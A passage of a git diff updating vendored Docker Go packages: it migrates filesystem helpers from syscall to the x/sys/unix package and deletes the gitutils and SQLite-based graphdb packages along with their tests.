:= tt.pattern s := tt.s if runtime.GOOS == "windows" { - if strings.Index(pattern, "\\") >= 0 { + if strings.Contains(pattern, "\\") { // no escape allowed on windows. continue } pattern = filepath.Clean(pattern) s = filepath.Clean(s) } - ok, err := regexpMatch(pattern, s) + ok, err := Matches(s, []string{pattern}) if ok != tt.match || err != tt.err { t.Fatalf("Match(%#q, %#q) = %v, %q want %v, %q", pattern, s, ok, errp(err), tt.match, errp(tt.err)) } diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go index d5c3abf568..565396f1c7 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go @@ -1,13 +1,13 @@ // +build linux freebsd -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( "fmt" "io/ioutil" "os" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) // GetTotalUsedFds Returns the number of used File Descriptors by diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go index 5ec21cace5..3f1ebb6567 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go @@ -1,4 +1,4 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" // GetTotalUsedFds Returns the number of used File Descriptors. Not supported // on Windows. 
diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go index 9fd054e77f..104211adea 100644 --- a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go @@ -1,13 +1,12 @@ -// +build linux - -package fsutils +package fsutils // import "github.com/docker/docker/pkg/fsutils" import ( "fmt" "io/ioutil" "os" - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func locateDummyIfEmpty(path string) (string, error) { @@ -23,10 +22,8 @@ func locateDummyIfEmpty(path string) (string, error) { return "", err } name := dummyFile.Name() - if err = dummyFile.Close(); err != nil { - return name, err - } - return name, nil + err = dummyFile.Close() + return name, err } // SupportsDType returns whether the filesystem mounted on path supports d_type @@ -42,9 +39,9 @@ func SupportsDType(path string) (bool, error) { visited := 0 supportsDType := true - fn := func(ent *syscall.Dirent) bool { + fn := func(ent *unix.Dirent) bool { visited++ - if ent.Type == syscall.DT_UNKNOWN { + if ent.Type == unix.DT_UNKNOWN { supportsDType = false // stop iteration return true @@ -61,7 +58,7 @@ func SupportsDType(path string) (bool, error) { return supportsDType, nil } -func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { +func iterateReadDir(path string, fn func(*unix.Dirent) bool) error { d, err := os.Open(path) if err != nil { return err @@ -70,7 +67,7 @@ func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { fd := int(d.Fd()) buf := make([]byte, 4096) for { - nbytes, err := syscall.ReadDirent(fd, buf) + nbytes, err := unix.ReadDirent(fd, buf) if err != nil { return err } @@ -78,7 +75,7 @@ func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { break } for off := 0; off < nbytes; { - ent := (*syscall.Dirent)(unsafe.Pointer(&buf[off])) + ent := (*unix.Dirent)(unsafe.Pointer(&buf[off])) if stop := 
fn(ent); stop { return nil } diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go index 4a648239c0..4e5a78b519 100644 --- a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go @@ -1,13 +1,14 @@ // +build linux -package fsutils +package fsutils // import "github.com/docker/docker/pkg/fsutils" import ( "io/ioutil" "os" "os/exec" - "syscall" "testing" + + "golang.org/x/sys/unix" ) func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg ...string) { @@ -53,7 +54,7 @@ func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg } // loopback-mount the image. - // for ease of setting up loopback device, we use os/exec rather than syscall.Mount + // for ease of setting up loopback device, we use os/exec rather than unix.Mount out, err = exec.Command("mount", "-o", "loop", imageFileName, mountpoint).CombinedOutput() if len(out) > 0 { t.Log(string(out)) @@ -62,7 +63,7 @@ func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg t.Skip("skipping the test because mount failed") } defer func() { - if err := syscall.Unmount(mountpoint, 0); err != nil { + if err := unix.Unmount(mountpoint, 0); err != nil { t.Fatal(err) } }() diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go deleted file mode 100644 index ded091f2a2..0000000000 --- a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go +++ /dev/null @@ -1,100 +0,0 @@ -package gitutils - -import ( - "fmt" - "io/ioutil" - "net/http" - "net/url" - "os" - "os/exec" - "path/filepath" - "strings" - - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/pkg/urlutil" -) - -// Clone clones a repository into a newly created directory which -// will be under "docker-build-git" -func Clone(remoteURL 
string) (string, error) { - if !urlutil.IsGitTransport(remoteURL) { - remoteURL = "https://" + remoteURL - } - root, err := ioutil.TempDir("", "docker-build-git") - if err != nil { - return "", err - } - - u, err := url.Parse(remoteURL) - if err != nil { - return "", err - } - - fragment := u.Fragment - clone := cloneArgs(u, root) - - if output, err := git(clone...); err != nil { - return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) - } - - return checkoutGit(fragment, root) -} - -func cloneArgs(remoteURL *url.URL, root string) []string { - args := []string{"clone", "--recursive"} - shallow := len(remoteURL.Fragment) == 0 - - if shallow && strings.HasPrefix(remoteURL.Scheme, "http") { - res, err := http.Head(fmt.Sprintf("%s/info/refs?service=git-upload-pack", remoteURL)) - if err != nil || res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" { - shallow = false - } - } - - if shallow { - args = append(args, "--depth", "1") - } - - if remoteURL.Fragment != "" { - remoteURL.Fragment = "" - } - - return append(args, remoteURL.String(), root) -} - -func checkoutGit(fragment, root string) (string, error) { - refAndDir := strings.SplitN(fragment, ":", 2) - - if len(refAndDir[0]) != 0 { - if output, err := gitWithinDir(root, "checkout", refAndDir[0]); err != nil { - return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) - } - } - - if len(refAndDir) > 1 && len(refAndDir[1]) != 0 { - newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, refAndDir[1]), root) - if err != nil { - return "", fmt.Errorf("Error setting git context, %q not within git root: %s", refAndDir[1], err) - } - - fi, err := os.Stat(newCtx) - if err != nil { - return "", err - } - if !fi.IsDir() { - return "", fmt.Errorf("Error setting git context, not a directory: %s", newCtx) - } - root = newCtx - } - - return root, nil -} - -func gitWithinDir(dir string, args ...string) ([]byte, error) { - a := []string{"--work-tree", dir, 
"--git-dir", filepath.Join(dir, ".git")} - return git(append(a, args...)...) -} - -func git(args ...string) ([]byte, error) { - return exec.Command("git", args...).CombinedOutput() -} diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go deleted file mode 100644 index d197058d20..0000000000 --- a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go +++ /dev/null @@ -1,220 +0,0 @@ -package gitutils - -import ( - "fmt" - "io/ioutil" - "net/http" - "net/http/httptest" - "net/url" - "os" - "path/filepath" - "reflect" - "runtime" - "strings" - "testing" -) - -func TestCloneArgsSmartHttp(t *testing.T) { - mux := http.NewServeMux() - server := httptest.NewServer(mux) - serverURL, _ := url.Parse(server.URL) - - serverURL.Path = "/repo.git" - gitURL := serverURL.String() - - mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { - q := r.URL.Query().Get("service") - w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q)) - }) - - args := cloneArgs(serverURL, "/tmp") - exp := []string{"clone", "--recursive", "--depth", "1", gitURL, "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func TestCloneArgsDumbHttp(t *testing.T) { - mux := http.NewServeMux() - server := httptest.NewServer(mux) - serverURL, _ := url.Parse(server.URL) - - serverURL.Path = "/repo.git" - gitURL := serverURL.String() - - mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { - w.Header().Set("Content-Type", "text/plain") - }) - - args := cloneArgs(serverURL, "/tmp") - exp := []string{"clone", "--recursive", gitURL, "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func TestCloneArgsGit(t *testing.T) { - u, _ := url.Parse("git://github.com/docker/docker") - args := cloneArgs(u, "/tmp") - exp := []string{"clone", "--recursive", 
"--depth", "1", "git://github.com/docker/docker", "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func TestCloneArgsStripFragment(t *testing.T) { - u, _ := url.Parse("git://github.com/docker/docker#test") - args := cloneArgs(u, "/tmp") - exp := []string{"clone", "--recursive", "git://github.com/docker/docker", "/tmp"} - if !reflect.DeepEqual(args, exp) { - t.Fatalf("Expected %v, got %v", exp, args) - } -} - -func gitGetConfig(name string) string { - b, err := git([]string{"config", "--get", name}...) - if err != nil { - // since we are interested in empty or non empty string, - // we can safely ignore the err here. - return "" - } - return strings.TrimSpace(string(b)) -} - -func TestCheckoutGit(t *testing.T) { - root, err := ioutil.TempDir("", "docker-build-git-checkout") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(root) - - autocrlf := gitGetConfig("core.autocrlf") - if !(autocrlf == "true" || autocrlf == "false" || - autocrlf == "input" || autocrlf == "") { - t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf) - } - eol := "\n" - if autocrlf == "true" { - eol = "\r\n" - } - - gitDir := filepath.Join(root, "repo") - _, err = git("init", gitDir) - if err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test"); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644); err != nil { - t.Fatal(err) - } - - subDir := filepath.Join(gitDir, "subdir") - if err = os.Mkdir(subDir, 0755); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644); err != nil { - t.Fatal(err) - } - - if runtime.GOOS != "windows" { - if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil { 
- t.Fatal(err) - } - - if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil { - t.Fatal(err) - } - } - - if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "commit", "-am", "First commit"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "checkout", "-b", "test"); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644); err != nil { - t.Fatal(err) - } - - if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit"); err != nil { - t.Fatal(err) - } - - if _, err = gitWithinDir(gitDir, "checkout", "master"); err != nil { - t.Fatal(err) - } - - type singleCase struct { - frag string - exp string - fail bool - } - - cases := []singleCase{ - {"", "FROM scratch", false}, - {"master", "FROM scratch", false}, - {":subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, - {":nosubdir", "", true}, // missing directory error - {":Dockerfile", "", true}, // not a directory error - {"master:nosubdir", "", true}, - {"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, - {"master:../subdir", "", true}, - {"test", "FROM scratch" + eol + "EXPOSE 3000", false}, - {"test:", "FROM scratch" + eol + "EXPOSE 3000", false}, - {"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false}, - } - - if runtime.GOOS != "windows" { - // Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. 
Sample output below - // git --work-tree .\repo --git-dir .\repo\.git add -A - // error: readlink("absolutelink"): Function not implemented - // error: unable to index file absolutelink - // fatal: adding files failed - cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) - cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) - } - - for _, c := range cases { - r, err := checkoutGit(c.frag, gitDir) - - fail := err != nil - if fail != c.fail { - t.Fatalf("Expected %v failure, error was %v\n", c.fail, err) - } - if c.fail { - continue - } - - b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile")) - if err != nil { - t.Fatal(err) - } - - if string(b) != c.exp { - t.Fatalf("Expected %v, was %v\n", c.exp, string(b)) - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go deleted file mode 100644 index 8e61ff3b4f..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go +++ /dev/null @@ -1,19 +0,0 @@ -// +build cgo - -package graphdb - -import ( - "database/sql" - - _ "github.com/mattn/go-sqlite3" // registers sqlite -) - -// NewSqliteConn opens a connection to a sqlite -// database. 
-func NewSqliteConn(root string) (*Database, error) { - conn, err := sql.Open("sqlite3", root) - if err != nil { - return nil, err - } - return NewDatabase(conn) -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go deleted file mode 100644 index eca433fa85..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go +++ /dev/null @@ -1,551 +0,0 @@ -package graphdb - -import ( - "database/sql" - "fmt" - "path" - "strings" - "sync" -) - -const ( - createEntityTable = ` - CREATE TABLE IF NOT EXISTS entity ( - id text NOT NULL PRIMARY KEY - );` - - createEdgeTable = ` - CREATE TABLE IF NOT EXISTS edge ( - "entity_id" text NOT NULL, - "parent_id" text NULL, - "name" text NOT NULL, - CONSTRAINT "parent_fk" FOREIGN KEY ("parent_id") REFERENCES "entity" ("id"), - CONSTRAINT "entity_fk" FOREIGN KEY ("entity_id") REFERENCES "entity" ("id") - ); - ` - - createEdgeIndices = ` - CREATE UNIQUE INDEX IF NOT EXISTS "name_parent_ix" ON "edge" (parent_id, name); - ` -) - -// Entity with a unique id. -type Entity struct { - id string -} - -// An Edge connects two entities together. -type Edge struct { - EntityID string - Name string - ParentID string -} - -// Entities stores the list of entities. -type Entities map[string]*Entity - -// Edges stores the relationships between entities. -type Edges []*Edge - -// WalkFunc is a function invoked to process an individual entity. -type WalkFunc func(fullPath string, entity *Entity) error - -// Database is a graph database for storing entities and their relationships. -type Database struct { - conn *sql.DB - mux sync.RWMutex -} - -// IsNonUniqueNameError processes the error to check if it's caused by -// a constraint violation. -// This is necessary because the error isn't the same across various -// sqlite versions. 
-func IsNonUniqueNameError(err error) bool { - str := err.Error() - // sqlite 3.7.17-1ubuntu1 returns: - // Set failure: Abort due to constraint violation: columns parent_id, name are not unique - if strings.HasSuffix(str, "name are not unique") { - return true - } - // sqlite-3.8.3-1.fc20 returns: - // Set failure: Abort due to constraint violation: UNIQUE constraint failed: edge.parent_id, edge.name - if strings.Contains(str, "UNIQUE constraint failed") && strings.Contains(str, "edge.name") { - return true - } - // sqlite-3.6.20-1.el6 returns: - // Set failure: Abort due to constraint violation: constraint failed - if strings.HasSuffix(str, "constraint failed") { - return true - } - return false -} - -// NewDatabase creates a new graph database initialized with a root entity. -func NewDatabase(conn *sql.DB) (*Database, error) { - if conn == nil { - return nil, fmt.Errorf("Database connection cannot be nil") - } - db := &Database{conn: conn} - - // Create root entities - tx, err := conn.Begin() - if err != nil { - return nil, err - } - - if _, err := tx.Exec(createEntityTable); err != nil { - return nil, err - } - if _, err := tx.Exec(createEdgeTable); err != nil { - return nil, err - } - if _, err := tx.Exec(createEdgeIndices); err != nil { - return nil, err - } - - if _, err := tx.Exec("DELETE FROM entity where id = ?", "0"); err != nil { - tx.Rollback() - return nil, err - } - - if _, err := tx.Exec("INSERT INTO entity (id) VALUES (?);", "0"); err != nil { - tx.Rollback() - return nil, err - } - - if _, err := tx.Exec("DELETE FROM edge where entity_id=? and name=?", "0", "/"); err != nil { - tx.Rollback() - return nil, err - } - - if _, err := tx.Exec("INSERT INTO edge (entity_id, name) VALUES(?,?);", "0", "/"); err != nil { - tx.Rollback() - return nil, err - } - - if err := tx.Commit(); err != nil { - return nil, err - } - - return db, nil -} - -// Close the underlying connection to the database. 
-func (db *Database) Close() error { - return db.conn.Close() -} - -// Set the entity id for a given path. -func (db *Database) Set(fullPath, id string) (*Entity, error) { - db.mux.Lock() - defer db.mux.Unlock() - - tx, err := db.conn.Begin() - if err != nil { - return nil, err - } - - var entityID string - if err := tx.QueryRow("SELECT id FROM entity WHERE id = ?;", id).Scan(&entityID); err != nil { - if err == sql.ErrNoRows { - if _, err := tx.Exec("INSERT INTO entity (id) VALUES(?);", id); err != nil { - tx.Rollback() - return nil, err - } - } else { - tx.Rollback() - return nil, err - } - } - e := &Entity{id} - - parentPath, name := splitPath(fullPath) - if err := db.setEdge(parentPath, name, e, tx); err != nil { - tx.Rollback() - return nil, err - } - - if err := tx.Commit(); err != nil { - return nil, err - } - return e, nil -} - -// Exists returns true if a name already exists in the database. -func (db *Database) Exists(name string) bool { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return false - } - return e != nil -} - -func (db *Database) setEdge(parentPath, name string, e *Entity, tx *sql.Tx) error { - parent, err := db.get(parentPath) - if err != nil { - return err - } - if parent.id == e.id { - return fmt.Errorf("Cannot set self as child") - } - - if _, err := tx.Exec("INSERT INTO edge (parent_id, name, entity_id) VALUES (?,?,?);", parent.id, name, e.id); err != nil { - return err - } - return nil -} - -// RootEntity returns the root "/" entity for the database. -func (db *Database) RootEntity() *Entity { - return &Entity{ - id: "0", - } -} - -// Get returns the entity for a given path. 
-func (db *Database) Get(name string) *Entity { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return nil - } - return e -} - -func (db *Database) get(name string) (*Entity, error) { - e := db.RootEntity() - // We always know the root name so return it if - // it is requested - if name == "/" { - return e, nil - } - - parts := split(name) - for i := 1; i < len(parts); i++ { - p := parts[i] - if p == "" { - continue - } - - next := db.child(e, p) - if next == nil { - return nil, fmt.Errorf("Cannot find child for %s", name) - } - e = next - } - return e, nil - -} - -// List all entities by from the name. -// The key will be the full path of the entity. -func (db *Database) List(name string, depth int) Entities { - db.mux.RLock() - defer db.mux.RUnlock() - - out := Entities{} - e, err := db.get(name) - if err != nil { - return out - } - - children, err := db.children(e, name, depth, nil) - if err != nil { - return out - } - - for _, c := range children { - out[c.FullPath] = c.Entity - } - return out -} - -// Walk through the child graph of an entity, calling walkFunc for each child entity. -// It is safe for walkFunc to call graph functions. -func (db *Database) Walk(name string, walkFunc WalkFunc, depth int) error { - children, err := db.Children(name, depth) - if err != nil { - return err - } - - // Note: the database lock must not be held while calling walkFunc - for _, c := range children { - if err := walkFunc(c.FullPath, c.Entity); err != nil { - return err - } - } - return nil -} - -// Children returns the children of the specified entity. -func (db *Database) Children(name string, depth int) ([]WalkMeta, error) { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return nil, err - } - - return db.children(e, name, depth, nil) -} - -// Parents returns the parents of a specified entity. 
-func (db *Database) Parents(name string) ([]string, error) { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return nil, err - } - return db.parents(e) -} - -// Refs returns the reference count for a specified id. -func (db *Database) Refs(id string) int { - db.mux.RLock() - defer db.mux.RUnlock() - - var count int - if err := db.conn.QueryRow("SELECT COUNT(*) FROM edge WHERE entity_id = ?;", id).Scan(&count); err != nil { - return 0 - } - return count -} - -// RefPaths returns all the id's path references. -func (db *Database) RefPaths(id string) Edges { - db.mux.RLock() - defer db.mux.RUnlock() - - refs := Edges{} - - rows, err := db.conn.Query("SELECT name, parent_id FROM edge WHERE entity_id = ?;", id) - if err != nil { - return refs - } - defer rows.Close() - - for rows.Next() { - var name string - var parentID string - if err := rows.Scan(&name, &parentID); err != nil { - return refs - } - refs = append(refs, &Edge{ - EntityID: id, - Name: name, - ParentID: parentID, - }) - } - return refs -} - -// Delete the reference to an entity at a given path. -func (db *Database) Delete(name string) error { - db.mux.Lock() - defer db.mux.Unlock() - - if name == "/" { - return fmt.Errorf("Cannot delete root entity") - } - - parentPath, n := splitPath(name) - parent, err := db.get(parentPath) - if err != nil { - return err - } - - if _, err := db.conn.Exec("DELETE FROM edge WHERE parent_id = ? 
AND name = ?;", parent.id, n); err != nil { - return err - } - return nil -} - -// Purge removes the entity with the specified id -// Walk the graph to make sure all references to the entity -// are removed and return the number of references removed -func (db *Database) Purge(id string) (int, error) { - db.mux.Lock() - defer db.mux.Unlock() - - tx, err := db.conn.Begin() - if err != nil { - return -1, err - } - - // Delete all edges - rows, err := tx.Exec("DELETE FROM edge WHERE entity_id = ?;", id) - if err != nil { - tx.Rollback() - return -1, err - } - changes, err := rows.RowsAffected() - if err != nil { - return -1, err - } - - // Clear who's using this id as parent - refs, err := tx.Exec("DELETE FROM edge WHERE parent_id = ?;", id) - if err != nil { - tx.Rollback() - return -1, err - } - refsCount, err := refs.RowsAffected() - if err != nil { - return -1, err - } - - // Delete entity - if _, err := tx.Exec("DELETE FROM entity where id = ?;", id); err != nil { - tx.Rollback() - return -1, err - } - - if err := tx.Commit(); err != nil { - return -1, err - } - - return int(changes + refsCount), nil -} - -// Rename an edge for a given path -func (db *Database) Rename(currentName, newName string) error { - db.mux.Lock() - defer db.mux.Unlock() - - parentPath, name := splitPath(currentName) - newParentPath, newEdgeName := splitPath(newName) - - if parentPath != newParentPath { - return fmt.Errorf("Cannot rename when root paths do not match %s != %s", parentPath, newParentPath) - } - - parent, err := db.get(parentPath) - if err != nil { - return err - } - - rows, err := db.conn.Exec("UPDATE edge SET name = ? WHERE parent_id = ? AND name = ?;", newEdgeName, parent.id, name) - if err != nil { - return err - } - i, err := rows.RowsAffected() - if err != nil { - return err - } - if i == 0 { - return fmt.Errorf("Cannot locate edge for %s %s", parent.id, name) - } - return nil -} - -// WalkMeta stores the walk metadata. 
-type WalkMeta struct { - Parent *Entity - Entity *Entity - FullPath string - Edge *Edge -} - -func (db *Database) children(e *Entity, name string, depth int, entities []WalkMeta) ([]WalkMeta, error) { - if e == nil { - return entities, nil - } - - rows, err := db.conn.Query("SELECT entity_id, name FROM edge where parent_id = ?;", e.id) - if err != nil { - return nil, err - } - defer rows.Close() - - for rows.Next() { - var entityID, entityName string - if err := rows.Scan(&entityID, &entityName); err != nil { - return nil, err - } - child := &Entity{entityID} - edge := &Edge{ - ParentID: e.id, - Name: entityName, - EntityID: child.id, - } - - meta := WalkMeta{ - Parent: e, - Entity: child, - FullPath: path.Join(name, edge.Name), - Edge: edge, - } - - entities = append(entities, meta) - - if depth != 0 { - nDepth := depth - if depth != -1 { - nDepth-- - } - entities, err = db.children(child, meta.FullPath, nDepth, entities) - if err != nil { - return nil, err - } - } - } - - return entities, nil -} - -func (db *Database) parents(e *Entity) (parents []string, err error) { - if e == nil { - return parents, nil - } - - rows, err := db.conn.Query("SELECT parent_id FROM edge where entity_id = ?;", e.id) - if err != nil { - return nil, err - } - defer rows.Close() - - for rows.Next() { - var parentID string - if err := rows.Scan(&parentID); err != nil { - return nil, err - } - parents = append(parents, parentID) - } - - return parents, nil -} - -// Return the entity based on the parent path and name. -func (db *Database) child(parent *Entity, name string) *Entity { - var id string - if err := db.conn.QueryRow("SELECT entity_id FROM edge WHERE parent_id = ? AND name = ?;", parent.id, name).Scan(&id); err != nil { - return nil - } - return &Entity{id} -} - -// ID returns the id used to reference this entity. -func (e *Entity) ID() string { - return e.id -} - -// Paths returns the paths sorted by depth. 
-func (e Entities) Paths() []string { - out := make([]string, len(e)) - var i int - for k := range e { - out[i] = k - i++ - } - sortByDepth(out) - - return out -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go deleted file mode 100644 index f0fb074b4d..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go +++ /dev/null @@ -1,721 +0,0 @@ -package graphdb - -import ( - "database/sql" - "fmt" - "os" - "path" - "runtime" - "strconv" - "testing" - - _ "github.com/mattn/go-sqlite3" -) - -func newTestDb(t *testing.T) (*Database, string) { - p := path.Join(os.TempDir(), "sqlite.db") - conn, err := sql.Open("sqlite3", p) - db, err := NewDatabase(conn) - if err != nil { - t.Fatal(err) - } - return db, p -} - -func destroyTestDb(dbPath string) { - os.Remove(dbPath) -} - -func TestNewDatabase(t *testing.T) { - db, dbpath := newTestDb(t) - if db == nil { - t.Fatal("Database should not be nil") - } - db.Close() - defer destroyTestDb(dbpath) -} - -func TestCreateRootEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - root := db.RootEntity() - if root == nil { - t.Fatal("Root entity should not be nil") - } -} - -func TestGetRootEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - e := db.Get("/") - if e == nil { - t.Fatal("Entity should not be nil") - } - if e.ID() != "0" { - t.Fatalf("Entity id should be 0, got %s", e.ID()) - } -} - -func TestSetEntityWithDifferentName(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/test", "1") - if _, err := db.Set("/other", "1"); err != nil { - t.Fatal(err) - } -} - -func TestSetDuplicateEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - if _, err := db.Set("/foo", "42"); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/foo", "43"); err == nil { - t.Fatalf("Creating an 
entry with a duplicate path did not cause an error") - } -} - -func TestCreateChild(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - child, err := db.Set("/db", "1") - if err != nil { - t.Fatal(err) - } - if child == nil { - t.Fatal("Child should not be nil") - } - if child.ID() != "1" { - t.Fail() - } -} - -func TestParents(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - for i := 1; i < 6; i++ { - a := strconv.Itoa(i) - if _, err := db.Set("/"+a, a); err != nil { - t.Fatal(err) - } - } - - for i := 6; i < 11; i++ { - a := strconv.Itoa(i) - p := strconv.Itoa(i - 5) - - key := fmt.Sprintf("/%s/%s", p, a) - - if _, err := db.Set(key, a); err != nil { - t.Fatal(err) - } - - parents, err := db.Parents(key) - if err != nil { - t.Fatal(err) - } - - if len(parents) != 1 { - t.Fatalf("Expected 1 entry for %s got %d", key, len(parents)) - } - - if parents[0] != p { - t.Fatalf("ID %s received, %s expected", parents[0], p) - } - } -} - -func TestChildren(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - str := "/" - for i := 1; i < 6; i++ { - a := strconv.Itoa(i) - if _, err := db.Set(str+a, a); err != nil { - t.Fatal(err) - } - - str = str + a + "/" - } - - str = "/" - for i := 10; i < 30; i++ { // 20 entities - a := strconv.Itoa(i) - if _, err := db.Set(str+a, a); err != nil { - t.Fatal(err) - } - - str = str + a + "/" - } - entries, err := db.Children("/", 5) - if err != nil { - t.Fatal(err) - } - - if len(entries) != 11 { - t.Fatalf("Expect 11 entries for / got %d", len(entries)) - } - - entries, err = db.Children("/", 20) - if err != nil { - t.Fatal(err) - } - - if len(entries) != 25 { - t.Fatalf("Expect 25 entries for / got %d", len(entries)) - } -} - -func TestListAllRootChildren(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - 
t.Skip("Needs porting to Windows") - } - - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - for i := 1; i < 6; i++ { - a := strconv.Itoa(i) - if _, err := db.Set("/"+a, a); err != nil { - t.Fatal(err) - } - } - entries := db.List("/", -1) - if len(entries) != 5 { - t.Fatalf("Expect 5 entries for / got %d", len(entries)) - } -} - -func TestListAllSubChildren(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - 